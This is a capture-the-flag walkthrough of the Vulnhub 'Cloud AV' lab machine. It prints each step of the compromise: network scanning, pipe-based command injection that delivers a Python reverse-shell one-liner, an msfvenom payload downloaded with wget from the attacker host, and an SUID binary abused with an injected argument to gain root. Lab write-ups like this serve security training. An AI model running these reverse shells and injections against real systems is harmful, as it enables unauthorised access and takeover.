BoredHackerBlog: Cloud AV Walkthrough

BoredHackerBlog: Cloud AV Walkthrough Vulnhub | BoredHackerBlog: Cloud AV Writeup Vulnhub

Today we solve vulnhub another CTF BoredHackerBlog: Cloud AV is created by BoredHackerBlog this vm difficulty is easy you can download here

Description

Cloud Anti-Virus Scanner! is a cloud-based antivirus scanning service. Currently, it’s in beta mode. You’ve been asked to test the setup and find vulnerabilities and escalate privs.

Network Scanning

The first step to attack is to identify the target. So, identify your target. To identify the target, we will use the following command

netdiscover
BoredHackerBlog: Cloud AV Walkthrough Vulnhub | BoredHackerBlog: Cloud AV Writeup Vulnhub

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine

nmap -A 192.168.43.6
BoredHackerBlog: Cloud AV Walkthrough Vulnhub | BoredHackerBlog: Cloud AV Writeup Vulnhub

We learned from the scan that we have the port 8080 open which is running Python httpd service, and we have the port 22 open.

Enumeration

Further, we need to start enumeration against the host machine, therefore we navigated to a web browser for exploring HTTP Python service. and Here we have the description Cloud Anti-Virus Scanner

http://192.168.43.6:8080

I try many code to login an I found valid invite code Password and we successful login the python virus scanner server

BoredHackerBlog: Cloud AV Walkthrough Vulnhub | BoredHackerBlog: Cloud AV Writeup Vulnhub

After login the virus scanner we see many files and we see a place holder and scan button I try many reverse shell and command injection and Finaly I break the jail using | and create a reverse python shell

first start your netcat listner and paste python socker reverse payload and click scan button execute the payload

nc -lvp 4545
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.103",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
BoredHackerBlog: Cloud AV Walkthrough Vulnhub | BoredHackerBlog: Cloud AV Writeup Vulnhub

we got a reverse connection traget machine I move on enumartion the directory and I found I suid bit execute file update_cloudav

cd /home
ls
cd scanner
ls -lsa

and here we see the source code of the file update_coudav.c After read the source code for the file I create a msfvenom reverse python payload and starting our local python server on port 80

msfvenom -p cmd/unix/reverse_python lhost=192.168.43.103 lport=4545 -f raw > shell.py
python -m SimpleHTTPServer 80
BoredHackerBlog: Cloud AV Walkthrough Vulnhub | BoredHackerBlog: Cloud AV Writeup Vulnhub

setup the msfconsole payload listner

msfdb run
use exploit/multi/handler
set payload cmd/unix/reverse_python
set lhost 192.168.43.103
set lport 4545
run

using the wget command I download the python reverse shell target machine

cat update_cloudav.c
wget http://192.168.43.103/shell.py
BoredHackerBlog: Cloud AV Walkthrough Vulnhub | BoredHackerBlog: Cloud AV Writeup Vulnhub

our shell is downloaded now we need to add a executable permission our reverse shell and again using pipe | executing our payload using the command

chmod +x shell.py
./update_cloudav 'hackNos|./shell.py'

our new session is and we see a blank shell now import python3 spawn shell and I ran the id command we see a root shell the target machine.

python3 -c 'import pty;pty.spanw("/bin/bash")'
id
BoredHackerBlog: Cloud AV Walkthrough Vulnhub | BoredHackerBlog: Cloud AV Writeup Vulnhub
Escalate My Privileges 1 Vulnhub Walkthrough link